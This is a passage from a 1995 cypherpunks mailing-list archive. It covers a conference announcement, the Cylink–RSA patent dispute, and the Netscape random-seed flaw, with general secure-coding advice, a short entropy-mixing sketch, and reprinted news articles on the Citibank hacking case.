DDk8hWAr+BvIcuYTC2irRTee7462YBjsBvwOiFVV+0/Wdbg2gjGfPgcmsxmzqi4R Tby1/d2Pr6c= =xm2W -----END PGP SIGNATURE----- From rah at shipwright.com Wed Sep 20 06:12:57 1995 From: rah at shipwright.com (Robert Hettinga) Date: Wed, 20 Sep 95 06:12:57 PDT Subject: Conference: WORLDWIDE ELECTRONIC COMMERCE Message-ID: --- begin forwarded text Date: Wed, 20 Sep 1995 06:03:04 +0059 (EDT) From: Michael S Baum Subject: Re: BSDC Update 1.2 To: Robert Hettinga Mime-Version: 1.0 Robert, Can you please consider letting your Boston list (or other lists) know about the following. Thanks. ---------------- ANNOUNCING: The Second Annual . . . WORLDWIDE ELECTRONIC COMMERCE Law, Policy, Security & Controls Conference October 18-20, 1995 At the Hyatt Regency Bethesda Phone: (214) 516-4900 The Second Annual WorldWide Electronic Commerce; Law, Policy, Security and Controls conference is fast approaching. This important event will feature the world's foremost experts addressing the most important issues of implementation and control related to secure electronic commerce. It will focus on current problems and provide a foundation for dealing with the emerging problems that promise to make the future more complex. We have been fortunate in securing a faculty that is unusually qualified and internationally recognized who will share their experience, knowledge and theories on the wide range of issues being addressed by this program. We are equally pleased to have obtained affiliation for this conference of a number of prestigious and influentual organizations. Please join us and your colleagues at this unique event! Michael S. Baum, J.D., M.B.A. Conference Chair Provided in Affiliation with: ============================================= * American Bar Association Section of Science and Technology Information Security Committee * University of London Queen Mary & Westfield College Centre for Commercial Law Studies * EDI Association of the United Kingdom * Harvard Law School * Internation Union of Latin Notaries * International Chamber of Commerce, Paris * National Institute of Standards and Technology (NIST) * Software Publishers Association * United Nations Commission on International Trade Law (UNCITRAL) * U.S. Council of International Business ============================================= Keynote Speaker: ---------------- Dr. Vinton G. Cerf, Ph.D. Senior Vice President MCI Telecommunications Corp. CONFERENCE PROGRAM ...at a glance GENERAL SCHEDULE ------------------------------------------------- Wednesday, October 19, 1995 6:00pm - 7:30pm SECURE ELECTRONIC COMMERCE FOR THE BEGINNER Thursday, October 20, 1995 8:00am - 9:00am Welcome & Keynote Speech 9:00am - 5:50pm Sessions 1 - 5 Friday, October 21, 1995 8:00am - 4:50pm Sessions 6 - 10 ---------------------------------------------- TRACK - A AGREEMENTS, LEGISLATION, POLICY AND REGULATION ---------------------------------------------- Session 1 So Who's in Charge, Anyway? The Impact of National & Int'l Leadership & Initiatives in Secure EC SPEAKERS: Harold S Burman, Esq., Office of the Legal Advisor Sally Katzen, Office of Management and Budget Bruce McConnell, Office of Management & Budget Renaud Sorieul, Esq., UNCITRAL Session 2 Drafting Agreements for Secure Electronic Commerce SPEAKERS: Michael S Baum, Esq., Independent Monitoring Thomas J Smedinghoff, Esq., McBride Baker & Coles Joe Wackerman, Esq., United States Postal Service Session 3 Are Privacy Requirements Inhibiting Electronic Commerce? SPEAKERS: Kenneth C Bass III, Esq., Venable, Baetjer, Howard & Civiletti Prof. George Trubow, The John Marshall Law School Ian Walden, Ph.D., Commission of the European Communities Session 4 Alternative Methods of Signing: Legal Aspects of the IRS's July 1995 Regulation SPEAKERS: Tom Baker, Esq.,Internal Revenue Service Lynn Casimir, Esq., Internal Revenue Service Celia Gabrysh, Esq., Internal Revenue Service Session 5 Digital Signature Legislation and Electronic Commerce SPEAKERS: Alan Asay, Esq., Utah Department of Commerce Kirk W Dillard, Esq., State Senator, State of Illinois Dean Sutherland, State Senator, Washinton State William E. Wyrough, Jr., J.D., M.B.A., Florida Legislature Session 6 The Legal Status and Effect of Digital Signatures - Perspectives SPEAKERS: Prof. Mads Andersen, University of Copenhagen Mario Miccoli, International Union of Latin Notaries Session 7 On-Line Registration vs. In-Person Registration: What Satisfies Business and Legal Requirements? SPEAKERS: Phillip Hallam-Baker, Massachusetts Institute of Technology Jeff Treuhaft, Netscape Communications Corporation Peter Williams, Verisign Session 8 Antitrust in Electronic Commerce: Shopping, Payments & Certification Authorities SPEAKERS: Prof. Mads Andersen, University of Copenhagen John Greanley, Esq., US Department of Justice, Antitrust Division Session 9 Proving Secure Computer-Based Transactions: Evidence Revisited SPEAKERS: Margaret A Berger, Brooklyn Law School Charles Nesson, Harvard Law School Ian Walden, Ph.D., Commission of the European Communities Session 10 Third Party Service Providers & Certification Authorities-Can They Successfully Limit their Liabilty SPEAKERS: Bruce Hunter, Esq., General Electric Information Services Ellen Kirsh, Esq., America On Line Renaud Sorieul, Esq., UNCITRAL -------------------- TRACK - B INFORMATION SECURITY -------------------- Session 1 Requirements for Implementing Reasonable Security Procedures SPEAKERS: Robert Daniels, Esq., U.S. Social Security Administation Dain Gary, Morgan Stanley Allan M Shiffman, Terisa Systems, Inc. Session 2 Information Security Standards: Policy, Coordination & Interoperability SPEAKERS: Marty Ferris, US Department of Treasury Hoyt Kesterson II, Bull Worldwide Information Systems Peter Landrock, Ph.D., CRYPTOMATHIC David Solo, Bolt, Beranek and Newman Session 3 Who's Really on the Other End: Identification Technologies and Nonrepudiation SPEAKERS: Benjamin Miller, Personal Identification News John E Siedlarz, IriScan, Inc. William Sweet, National Semiconductor Session 4 Security and Security Policy in Internet-based Payments Systems SPEAKERS: Marty Ferris, US Department of Treasury Tim Jones, Mondex Anne Wallace, US Department of Treasury Session 5 When You Forget Your PIN or Die: Key Escrow in Secure Electronic Commerce SPEAKERS: Prof. Michael Froomkin, University of Miami School of Law Jeff Greiveldinger, US Department of Justice, Criminal Div. Frank W Sudia, Bankers Trust Company Session 6 Comparing Critical Cryptographic Algorithms, Protocols, and Standards to Enable Secure Electronic Commerce SPEAKERS: Peter Landrock, Ph.D., CRYPTOMATHIC Ron Rivest, Massachusetts Institute of Technology Miles E Smid, National Institute of Standards & Tech. Session 7 Export Controls & Transborder Data Flows: Is Secure Electronic Commerce in Jeopardy? SPEAKERS: James Bidzos, RSA Data Security Renee H Danckwerth, Export Consultant Session 8 'Certificates-R-US': Trust Models and the Developing Secure Information Infrastructure SPEAKERS: Warwick Ford, Bell-Northern Research Sead Muftic, COST Computer Security Technologies Peter Williams, Verisign Session 9 Professional Accreditation and Certification - The New Frontier in 'Remote Trust' SPEAKERS: Richard C Koenig, Int'l Info. Sys. Security Cert. Consort. Alan M Schwartz, Esq., American Bar Association Session 10 Looking into the Crystal Ball: Certificates Revisited SPEAKERS: Web Augustine, VeriSign, Inc. Warwick Ford, Bell-Northern Research Hoyt Kesterson II, Bull Worldwide Information Systems ------------------------------------------- TRACK - C LEGAL ASPECTS OF SECURE ELECTRONIC COMMERCE ------------------------------------------- Session 1 Do Criminal Laws Really Protect Electronic Commerce? SPEAKERS: Scott Charney, Esq., US Department of Justice William J Cook, Brinks, et al. Richard A Ress, Federal Bureau of Investigation Session 2 Who Owns the Information, Standards, Certificates and Cryptographic Keys? SPEAKERS: Peter Harter, National Public Telecomputing Network David W Maher, Esq., Sonnenschein Nath & Rosenthal James Powers, Esq., Shulman, Rogers et. al Session 3 Consumers on the Net - Fairness, Conspicuousness, Notice, and Reliance SPEAKERS: Nessa Eileen Feddis, Esq., Government Relations/Retail Banking Ray Nimmer, Esq., Weil, Gotshal & Manges Session 4 Electronic Licensing and Distribution of Digital Content: Downloading for Liability? SPEAKERS: James C McKay, Jr., Office of the Corporation Counsel, D.C. Thomas J Smedinghoff, Esq., McBride Baker & Coles Mark Traphagen, Software Publishers Association. Session 5 Insuring Electronic Commerce Transactions and Infrastructure SPEAKERS: Andrew Cockrane, Alexander & Alexander Norman R Nelson, New York Clearing House Association Session 6 Auditing a Third Party/Value Added Network or Certification Authority (and Its Implications) SPEAKERS: Charles H LeGrand, CIA, Institute of Internal Auditors John Stelzer, COMMERCE:Institute Session 7 Electronic Recordkeeping - What to Save, When and How to Save It, and for How Long SPEAKERS: Lynn Casimir, Esq., Internal Revenue Service Celia Gabrysh, Esq., Internal Revenue Service Claude Perreault, Chambre des notaires du Quebec Session 8 Disaster and Contingency Planning Services: What is Needed for EC and Certification Authorities SPEAKERS: Dain Gary, Morgan Stanley Ake Nilson, Marinade Limited Helena Roine-Taylor, The Finnish Data Communication Assoc. FINPRO David Solo, Bolt, Beranek and Newman Session 9 General Counsel's Forum on Computer-Based Trade SPEAKERS: Robert W Barger, Esq., AT&T Bruce Hunter, Esq., General Electric Information Services Ellen Kirsh, Esq., America On Line Session 10 An Audit Model for Your Electronic Commerce Infrastructure SPEAKERS: Gerald R Bielfeldt, NationsBank Phillip Oddo, Ciba-Geigy Horton Sorkin, Ph.D., Howard University ------------------------------ TRACK - D INFRASTRUCTURAL CONSIDERATIONS ------------------------------ Session 1 Securely Shopping on the Web: New Paradigms, Protocols and Opportunities SPEAKERS: Jeff Hilt, VISA International Todd Ostrander, Egghead Software Session 2 What can Trusted Third Parties and Certification Authorities Learn from the Financial Clearinghouses SPEAKERS: Carol Barrett, Federal Reserve Bank of New York Bill Nelson, National Automated Clearinghouse Associa Norman R Nelson, New York Clearing House Association Session 3 Electronically 'Gluing' Computer-based Records SPEAKERS: Phillip Hallam-Baker, Massachusetts Institute of Technology Allan M Shiffman, Terisa Systems, Inc. Session 4 Global Registries for Secure Electronic Commerce SPEAKERS: Jonathan Allen, Barum Computer Consultants Michel Peereman, Federation Nationale des Chambres Peter Robinson, US Council for International Business Session 5 Computer-based Negotiability: What is Needed to Make it Work SPEAKERS: Harold S Burman, Esq., Office of the Legal Advisor James E Byrne, James Mason University Law School Ake Nilson, Marinade Limited Session 6 Time/Date Stamping of Digital Information: Necessities & Options SPEAKERS: Richard Rothwell, United States Postal Service Scott Stornetta, Surety Technologies, Inc. Session 7 Will Healthcare-related Electronic Commerce Require Special Controls and Secure Infrastructures? SPEAKERS: Kathleen Frawley, J.D., M.S., R.R.A, AHIMA Daniel J O'Shea, National Computer Claims Service Session 8 The Role of Notaries in Securing Computer-Based Commerce: the CyberNotary(sm) SPEAKERS: Theodore S Barassi, Esq., US Council for International Business Mario Miccoli, International Union of Latin Notaries Session 9 Electronic Cash and Novel Electronic Commerce Payments Systems SPEAKERS: Nessa Eileen Feddis, Esq., Government Relations/Retail Banking Ron Rivest, Massachusetts Institute of Technology Marvin Sirbu, Carnegie-Mellon University Session 10 Why does Everyone Want to be a Trusted Third Party/Certification Authority (at Least Initially)? SPEAKERS: Sead Muftic, COST Computer Security Technologies Stratton D Sclavos, VeriSign, Inc. ----------------------------------------------------------------- TO REGISTER: ------------- Price: $550.00 (U.S.) Name: Title: First Name for Badge: Company/Organization: Address: City/State/Prov/Zip/Postal code: Country: Telephone: Fax: E-Mail: Check One: ========== [ ] I am Mailing a check in the amount of $______ [ ] I wish to charge this to a credit card (fax or mail only) [ ] American Express [ ] Visa [ ] MasterCard Card Number: Expiration Date: Name on Card: Signature (fax or mail): ----------------------------------------------------------------- HOTEL RESERVATIONS: A special conference rate of $129 has been arranged for our attendees. To make arrangements, please call the Hyatt Regency Bethesda at (301) 657-1234 Hyatt Regency Bethesda One Bethesda Metro Center Bethesda, MD 20814 ----------------------------------------------------------------- For more information or a complete program brochure and schedule, contact the conference coordinators as shown below: HOW TO CONTACT US ================= E-Mail: wec at multicorp.com Phone: (214) 516-4900 Fax: (214) 424-0562 Mail: Worldwide Electronic Commerce PO Box 743485 Dallas, TX 75374 =============================================== --- end forwarded text ----------------- Robert Hettinga (rah at shipwright.com) Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131 USA (617) 323-7923 "Reality is not optional." --Thomas Sowell >>>>Phree Phil: Email: zldf at clark.net http://www.netresponse.com/zldf <<<<< From rmartin at aw.sgi.com Wed Sep 20 06:16:09 1995 From: rmartin at aw.sgi.com (Richard Martin) Date: Wed, 20 Sep 95 06:16:09 PDT Subject: `Random' seed. Message-ID: <9509200915.ZM14792@glacius.alias.com> Vaporware which I heard around CFP '95, and have been sort of wondering about ever since... Some one told me that some one else [possibly Matt Blaze] had been looking at how much randomness could be got by forking two child processes which would just run as asynchronous clocks: whenever the parent program needs a little `random' bit, it queries both and gives (clock(A) + clock(B) % 2) or something. Questions about this [to the list]: * who has done any [the?] work on this? * was it found to be useful/good or not? * what would be the drawbacks to adding this [Yet Another Source Of Entropy] to the Netscape scheme? frodo =) -- Richard Martin Alias|Wavefront - Toronto Office [Co-op Software Developer, Games Team] rmartin at aw.sgi.com/g4frodo at cdf.toronto.edu http://www.io.org/~samwise Trinity College UofT ChemPhysCompSci 9T7+PEY=9T8 Shad Valley Waterloo 1992 From koontz at MasPar.COM Wed Sep 20 06:20:52 1995 From: koontz at MasPar.COM (David G. Koontz) Date: Wed, 20 Sep 95 06:20:52 PDT Subject: NSA and Netscape Crack Message-ID: <9509201325.AA24783@argosy.MasPar.COM> >>"I'm from the NSA, I'm here to help your crypto..." The quote should be "I'n form the NSA, I'm here to help your crypto. You have where else to go!" (apologies to George Lucas) From perry at piermont.com Wed Sep 20 06:29:32 1995 From: perry at piermont.com (Perry E. Metzger) Date: Wed, 20 Sep 95 06:29:32 PDT Subject: Cylink In-Reply-To: <9509192145.AA01100@ch1d157nwk> Message-ID: <199509201328.JAA04874@frankenstein.piermont.com> Andrew Loewenstern writes: > > The arbitrators ruled that RSA hasn't had the right to sublicense > > the Stanford patents since 1990. > > > > Cylink said it would seek royalties from companies that have licensed > > software code from RSA and are redistributing it, arguing that they > > are infringing the Stanford patents. > > hahahaha, this is funny if it's true... Anyone know which two patents they > are referring to? (diffie-hellman and merkle-hellman?) > > Any ideas on how this will change the legal status of RSAREF and PGP? I'm much more interested in how this changes the legal status of the D-H derived encryption systems like ElGamal, and how it alters the patent status on the DSS, which is basically also derived from the same root. Perry From koontz at MasPar.COM Wed Sep 20 06:33:39 1995 From: koontz at MasPar.COM (David G. Koontz) Date: Wed, 20 Sep 95 06:33:39 PDT Subject: NSA and Netscape Crack Message-ID: <9509201337.AA24843@argosy.MasPar.COM> >"I'n form the NSA, I'm here to help your crypto. You have where else >to go!" I've never seen something transformed so. Talk about munging characters. I'm suprised there are no control characters in this. Whats was meant: "I'm from the NSA, I'm here to help your crypto." "You have no where else to go!" (as said by a seven foot robot cop in black leather). (and it wasn't even over a MODEM) From paul at poboy.b17c.ingr.com Wed Sep 20 06:55:15 1995 From: paul at poboy.b17c.ingr.com (Paul Robichaux) Date: Wed, 20 Sep 95 06:55:15 PDT Subject: Cylink In-Reply-To: <199509201328.JAA04874@frankenstein.piermont.com> Message-ID: <199509201343.AA12329@poboy.b17c.ingr.com> -----BEGIN PGP SIGNED MESSAGE----- > Andrew Loewenstern writes: > > Any ideas on how this will change the legal status of RSAREF and PGP? Then Perry Metzger replied: > I'm much more interested in how this changes the legal status of the > D-H derived encryption systems like ElGamal, and how it alters the > patent status on the DSS, which is basically also derived from the > same root. What I'm waiting to see is who sues RSADSI for recovery of royalties paid to Cylink. Imagine how Apple, Lotus, and all of the other bigcorps using RSA must feel right about now: they licensed a patent from the wrong people, and it appears that RSADSI may have known that their rights had expired. What about Roger Schlafly's suit? Anything new on it? - -Paul - -- Paul Robichaux, KD4JZG | "Things are much simpler and less stressful perobich at ingr.com | when you don't look to the law to fix things." Not speaking for Intergraph | - Tim May (tcmay at got.net) on cypherpunks Be a cryptography user. Ask me how. -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMGAajKfb4pLe9tolAQG8dwP+Mt8frNZVf87eQOlpIGZ0V7fJDD1CoLSg 6yt6inPeTcjUK52rYLV4ut2hm2q7yASsGi2PlXm+oXh9gi5rCjCNClR8ffRI/f3Z PklwDT+KYm9XB9pJfDPJXzVf9jevY7Ge+m4QBFWymXiQ3DLhsu+Mh8kijTO47uJ9 rZHjHPFjBEo= =UAqt -----END PGP SIGNATURE----- From perry at piermont.com Wed Sep 20 07:05:47 1995 From: perry at piermont.com (Perry E. Metzger) Date: Wed, 20 Sep 95 07:05:47 PDT Subject: NYT on Netscape Crack In-Reply-To: <199509200403.AAA14189@clark.net> Message-ID: <199509201405.KAA04961@frankenstein.piermont.com> Ray Cromwell writes: > > > > > > Sigh. For your information the security code for 1.x versions of > > > netscape was not even written by someone from NCSA. > > > > If there is ANY place in the code that I can do a data driven buffer > > overflow, I can force you to execute code that I supply. I don't give > > a damn if it's in the "security" code. It makes no difference where it > > is. If there is a chink, thats it -- you're meat. > > How would you do this if the buffer overflow happened in a buffer > which was allocated in a separate protected heap apart from stack > and executable data? You could do that, but thats not how C does things. C allocates these things on the stack. Overflow the buffer and you fandango on stack, allowing you to change where the program counter jumps to on subroutine exit, and allowing you to force your own machine code into the system for execution. I suspect that even were subroutine data allocated in a seperate heap you could pull nasty tricks -- your protected heap probably has data in it that controls execution flow, so cleverness might still get you the same results. Perry From stevenw at iglou.com Wed Sep 20 07:13:13 1995 From: stevenw at iglou.com (Steven Weller) Date: Wed, 20 Sep 95 07:13:13 PDT Subject: Netscape sub rosa? Message-ID: >Gee, where's that "Cypherpunks logo" when you really need it? >From a PR standpoint, this is the best idea of the year. >A rose covering the Netscape "N" logo? A crypto eagle swooping down and >pecking at weak keys? How about a big 200 pin PGA chip with a jagged crack right across it? Implications of "broken" or "cracked", obviously technical/electronic, and echoes of Clipper. Throw some streams of ones and zeroes in the background for good measure. ------------------------------------------------------------------------- Steven Weller | "The Internet, of course, is more +1 415 390 9732 | than just a place to find pictures | of people having sex with dogs." stevenw at iglou.com | -- Time Magazine, 3 July 1995 From nobody at REPLAY.COM Wed Sep 20 07:25:24 1995 From: nobody at REPLAY.COM (Anonymous) Date: Wed, 20 Sep 95 07:25:24 PDT Subject: Banks and Netscape InSec Message-ID: <199509201425.QAA22671@utopia.hacktic.nl> Financial Times, September 20, 1995, p. 12. Banks' Security Chains Failed The Citibank case has highlighted weaknesses in corporate security measures. By John Mason Could it happen to us? Banks have been soul-searching about their security systems in response to the alleged computer hacking fraud on Citibank, in which $10m (6.49m pounds) is said to have been removed from client accounts by a young Russian based in St Petersburg. In public, banks express confidence in their computer security. "It's a shame what happened at Citibank, but it couldn't happen here," is a typical response. However, some industry insiders are concerned that many banks and other commercial organisations are still leaving themselves dangerously open to attack by hackers. Rumours of some banks not admitting to similar breaches only increase doubts. The full technical picture of what allegedly happened at Citibank is unclear. The largest US bank, unsurprisingly, is reluctant to reveal precisely how Mr Vladimir Levin -- apparently without inside help -- allegedly breached its Wall Street security system from his personal computer in St Petersburg. A UK court will today decide whether to extradite Mr Levin to the US to face trial. It seems that Citibank was caught out by its technology, which could not match recent developments available to hackers. Citibank's main weakness is known to have been its use of "fixed passwords" to guard its computerised cash management system. This system, dubbed Citicorp Cash Manager, handles transactions totalling $5OObn every day. Cash management systems which provide customers with access to their accounts so that they can make transfers, are inherently vulnerable to hackers because by definition they allow third-party access. In the case of Citibank, access to the cash management system could be made via telephone lines from anywhere in the world using a computer. Until the incident, Citibank's system used fixed or permanent passwords where the customer has only to enter a name and regular password to gain entry to the system. However, security experts now agree that this technology has been rendered ineffective at guarding high-risk systems by the proliferation of modem communications devices attached to powerful PCs providing access to the Internet. Hackers now have ready access to sophisticated software including "sniffers" -- programs used by network managers which allow them to look at and capture information on networks. These give hackers access to huge quantities of information -- including directories of passwords. The hackers can then take their pick of which password to use. With bank cash management systems, this virtually amounts to giving a hacker the choice of which client account to loot. There are a number of steps banks and other security-conscious computer network operators can take to defend themselves against unauthorised intruders. The main option -- and that introduced by Citibank since the Levin incident -- involves the use of encrypted passwords that can be used only once. A "smart card" issued to each customer contains a sequence of passwords so that a different one is used each time. This password is then encrypted or scrambled into a form that is, its manufacturers claim unreadable to anyone "surfing" the Internet. The main computer then deciphers the signal and, able to recognise the sequence of changing passwords, lets the genuine user into the system. The chances of someone guessing one of Citibanks's passwords are now one in 11m, says Mr Tom Brady of Enigma Logic of Concord, California, which supplies this technology to Citibank. The bank's previous fixed password technology, by contrast, meant breaking the password system was relatively straightforward, he says. Concern centres on how quickly banks and others have reacted to technological change. Although encryption technology has been available for more than 10 years, it is only now being generally introduced, and usually only for systems with external access. Barclays Bank introduced encryption for computer systems with external access before the Citibank incident occured. Barclays now feels "fairly comfortable" about the state of its security, says Mr Philip Severs, deputy director of operational risk. However, it is clear that not every bank has closed the door yet. Mr Severs says the business world is just "on the cusp" of introducing encryption technology. Another security adviser says the measures of one leading US bank, based on both fixed and encrypted passwords, are still considered weak by experts. Another security specialist employed by a leading international bank says that senior management throughout the industry has sometimes been slow to react to change. "Sometimes people think that their security is adequate simply because it has not been breached in the past. At other times, head offices are warned of the dangers, but fail to act because of cost factors." Whatever the state of bank security, their experts agree that their customers' awareness of the problem is lower. "Whenever payments are made or orders placed electronically, then a threat exists. The banks are leading on this. Companies are some way behind," says Mr Severs. But encryption remains only one way of improving security. The alleged hacking incident at Citibank involved more than simply breaching the bank's password system. The US government claims Mr Levin was able to watch corporate clients making numerous transactions before deciding which account to take money from. He also allegedly spotted one security precaution in place and limited each of his withdrawals to under 200,000 pounds ($310,540). Citibank will not comment on its security measures other than to point to its "smart cards". Huwever, the bank agrees that there was only partiai use of another well-established. security system -- "predefined" transfer routes. These allow customers to make transfers only to specific bank accounts making it impossible for a hacker to remove funds for himself. Citibank offers such an option. However, it is only useful to some customers. The average corporate customer might find it suitable because the number of destination accounts they need is limited. However, for financial institutions making transfers to many accounts, such a system is too cumbersome. Perhaps significantly, one of Mr Levin's alleged nctims was an investment company. Citibank investigators say Mr Levin gave himself away by making a number of "amateurish" mistakes, but admit he was a very sophisticated computer operator, allegedly attempting a particularly elegant fraud. The bank concedes that it still does not fully understand all the technical aspects of how Mr Levin allegedly managed to break in. If and when he is extradited to the US and introduced to that country's plea bargaining system, he will be invited to explain further. Banking security experts agree that the Citibank episode shows that effective detection systems to track unusual transactions remain essential. In the Citibank case these worked well, enabling the attempted fraud to be nipped in the bud, monitored and losses kept to $400,000. But they agree that even if new technology is introduced, keeping one step ahead of the hackers all the time is just not possible. One with knowledge of the Citibank case comments: "At the end of the day it cannot be done. Essentially, security is about being reactive, not pro-dctive." Meanwhile, the Citibank episode provides the most public example yet of how hackers can threaten the integrity of the international banking system. And just as the Barings collapse prompted other banks to review their internal management controls, so Mr Levin's case is having a similar effect on computer security. But as one bank security expert says: "It takes an incident like this to prompt people to review their systems. Whether they take action however is a different matter." ----- Financial Times, September 20, 1995, p. 20. Netscape flaw may deal blow to Internet security By Louise Kehoe in San Francisco A security flaw in Netscape Communications' popular Internet software could deal a serious blow to companies planning to transact business on the Internet, the global computer network. The flaw, discovered by two computer science students at the University of California at Berkeley, means that financially sensitive data, such as credit card numbers, sent over the Internet using Netscape software could be vulnerable to computer hackers. "Security is the number one issue" that needs to be resolved if the Internet is to become a medium for largescale electronic commerce, according to Ms Cathy Medich, executive director of CommerceNet, a consortium of companies that is developing standards and protocols for conducting business on the Internet with backing from the US government. The security breach is a setback for Netscape, raising concerns about the company's ability to produce reliable secure software. Netscape's so-called secure browsers are used by an estimated 66 per cent of people accessing the World Wide Web, the segment of the Internet where thousands of companies have set up electronic displays of their products. The software had been seen as a breakthrough for electronic commerce, enabling people to buy and sell goods online without fear of their messages being intercepted. Netscape confirmed that a security loophole has been identified, but said it would offer a free security "patch" by the end of this week on its World Wide Web page (http://home.netscape.com). No losses have been reported as a result of the security breach, Netscape said. This is the second time that Netscape's encryption has been "cracked". Last month, a computer expert in France was able to decode the weaker version of Netscape's cyphers, which the company is allowed to export. The security flaw found by the Berkeley students affects all current versions of Netscape soMware, including its browsers and server software, the company said. However, next week the company will begin trials of a new version of its browser, which will contain the security patch. ----- From aba at dcs.exeter.ac.uk Wed Sep 20 07:30:31 1995 From: aba at dcs.exeter.ac.uk (aba at dcs.exeter.ac.uk) Date: Wed, 20 Sep 95 07:30:31 PDT Subject: Cylink Message-ID: <4454.9509201427@exe.dcs.exeter.ac.uk> Paul Robichaux writes: > Andrew Loewenstern writes: > > Any ideas on how this will change the legal status of RSAREF and PGP? > > Then Perry Metzger replied: > > I'm much more interested in how this changes the legal status of the > > D-H derived encryption systems like ElGamal, and how it alters the > > patent status on the DSS, which is basically also derived from the > > same root. > > What I'm waiting to see is who sues RSADSI for recovery of royalties > paid to Cylink. Imagine how Apple, Lotus, and all of the other > bigcorps using RSA must feel right about now: they licensed a patent > from the wrong people, and it appears that RSADSI may have known that > their rights had expired. It's sooo gratifying seeing the err, ever so slightly litigious folks from RSADSI get a dose of their own medicine. :-) Does it apply to RSA and hence PGP by way of RSAREF, and a claimed general patent on PK, or was this court decision on specific DH patents only? If so I hope the proud new owners have better marketing sense than to stomp on their huge advertisment of RSA, PGP. Adam From perry at piermont.com Wed Sep 20 07:37:07 1995 From: perry at piermont.com (Perry E. Metzger) Date: Wed, 20 Sep 95 07:37:07 PDT Subject: netscape's response In-Reply-To: <9509200254.ZM206@tofuhut> Message-ID: <199509201436.KAA05021@frankenstein.piermont.com> "Jeff Weinstein" writes: > It turns out that Taher Elgamal and I started working here within > a week of each other, about 6 months ago. Neither of us thought to > take a serious look at the RNG seed code. I don't think that anyone > would accuse Taher of being an amateur in this area. Well, he is more of a math guy than a practical guy. For a long time, I've posted articles and have seen other people post articles arguing that the right place to attack systems like this is in spots like the random number generators. Were I Netscape, I'd be conducting code reviews for lots of other things, too. Your coding standards should out and out ban the use, anywhere in your code, of sprintf, gets, strcat, or any other thing that manipulates strings without explicitly taking length limits. system and any similar calls should also be banned entirely. It doesn't matter if you "think" they are safe -- calls you don't use can't be somehow trickily abused. I suspect, however, that the seductiveness of "oh, this looks safe enough" will probably continue to win out with your colleagues over systematic approaches to these problems. After all, they never seemed to learn the lesson in revision after revision of NCSA's stuff. This is not to say that I think *you* are bad at this, Mr. Weinstein, but you certainly have colleagues with the worst possible track record. Perry From futplex at pseudonym.com Wed Sep 20 07:40:46 1995 From: futplex at pseudonym.com (Futplex) Date: Wed, 20 Sep 95 07:40:46 PDT Subject: USA Today on Fear of Credit Cards over Net Message-ID: <9509201440.AA28932@cs.umass.edu> USA Today reports in its 9/20/95 edition, on the front of the Money section, that "Few Feel Safe Making On-Line Transactions". A survey of 427 "computer users" by USA Today and Intelliquest yielded the results below. [The article doesn't say whether the survey was conducted before or after news of the bad seeds hit. . I only bought USA Today because my best friend gets her 15 minutes of fame below the fold on page 7D of the Life section today.] I'm not sure exactly what "sending a credit-card number to a commercial on- line service" means. Apparently it's seen as slightly safer than phoning it in, but much riskier than snail-mailing it in to an ISP. How much do PC users trust: Automatic teller machines 77% Banking by phone 62% Banking by computer 57% Using a credit card or calling card at a public phone 57% Writing a credit-card number on a catalog order form 43% Sending a credit-card number to a commercial on-line service 34% Giving a credit-card number over the phone 31% Sending a credit-card number over the Internet 5% (margin of error = +/- 4.7%) Raph also gets mentioned, mainly for "human interest" I'm afraid :/ Even those familiar with the Internet do not routinely use it for financial transactions. Raph Levien -- a computer science Ph.D. candidate reached via Internet -- says he has only used his credit card once over the Internet. About a year ago, he bought three CDs: Best of Alan Parsons Project, Enya and Beethoven's Ninth. Levien is a member of the group cypherpunks, which announced on-line Sunday night that hackers found the security flaw in Netscape's software. Still, Levien says Netscape's system "is among the safest that there is." -Futplex From robl at on-ramp.ior.com Wed Sep 20 07:54:16 1995 From: robl at on-ramp.ior.com (Rob L) Date: Wed, 20 Sep 95 07:54:16 PDT Subject: [NOISE] Re: Cylink In-Reply-To: <199509201343.AA12329@poboy.b17c.ingr.com> Message-ID: > What about Roger Schlafly's suit? Anything new on it? > - -Paul Some pin stripping and a spot of tomato soup.. (sorry.. couldn't pass it up.. From perry at piermont.com Wed Sep 20 08:07:08 1995 From: perry at piermont.com (Perry E. Metzger) Date: Wed, 20 Sep 95 08:07:08 PDT Subject: My Day In-Reply-To: <9509201248.AA09892@alpha> Message-ID: <199509201506.LAA05066@frankenstein.piermont.com> Mike McNally writes: > Also (and note that it's been a while since I've messed around with > PC's, but since the "architecture" remains chained to an early-80's > design I suspect they're still the same) the PC clock frequency is > generally pretty low. No, it isn't actually. You can get a microsecond timer out of it. The clock interrupts occur only infrequently, but the clock chip itself increments very very fast, and if you wanted microsecond timings of keystrokes there are registers that will give you what you want. Perry From jamesd at echeque.com Wed Sep 20 08:09:51 1995 From: jamesd at echeque.com (James A. Donald) Date: Wed, 20 Sep 95 08:09:51 PDT Subject: No Subject Message-ID: <199509201509.IAA19829@blob.best.net> At 5:53 AM 9/20/95, Jeff Weinstein wrote: > This was a bad mistake on our part, and we are working hard to fix it. > We have been trying to identify sources of random bits on PCs, Macs, and > all of the many unix platforms we Maintain a 4K entropy buffer. Mingle the exact time an place of each mouse hit into the entropy buffer using some combination that will have the effect of progressively shifting bits all over the place, so that every noise bit that you get eventually effects every bit of the buffer in a complicated way. For example: Buf[p] = MouseNoise + Buf[p] + Buf[p-24] + Buf[p-55]; p = p+1; (See Knuth, SemiNumerical Algorithms, Book 2, page 27 for the magic properties of the numbers 24, 55. This rule means that buffer immediately before p depends in a non linear fashion on all the noise you have received.) Whenever you need a random number, take a one way checksum, for example MD5, of the most recently altered part of that buffer. Use that as your random number. Whenever the user has used this buffer during a session, then when he quits netscape, save the buffer after first hashing it. To hash the buffer without loss of entropy, take the hash of one block of the buffer, and XOR it onto the next block (not the block that you hashed.) Repeat for each block in the buffer cyclicly. Publish your random number and encryption code here and in sci.crypt. --------------------------------------------------------------------- | We have the right to defend ourselves | http://www.jim.com/jamesd/ and our property, because of the kind | of animals that we are. True law | James A. Donald derives from this right, not from the | arbitrary power of the state. | jamesd at echeque.com From rah at shipwright.com Wed Sep 20 08:18:15 1995 From: rah at shipwright.com (Robert Hettinga) Date: Wed, 20 Sep 95 08:18:15 PDT Subject: Security Flaw Is Discovered In Software Used in Shopping Message-ID: --- begin forwarded text Date: Wed, 20 Sep 1995 10:47:24 -0400 (EDT) From: Nathaniel Borenstein To: www-buyinfo at allegra.att.com Subject: Re: Security Flaw Is Discovered In Software Used in Shopping Without belaboring the point too much, I think there are a few conclusions that really ought to be drawn: -- The world has never seen unbreakable encryption software, and 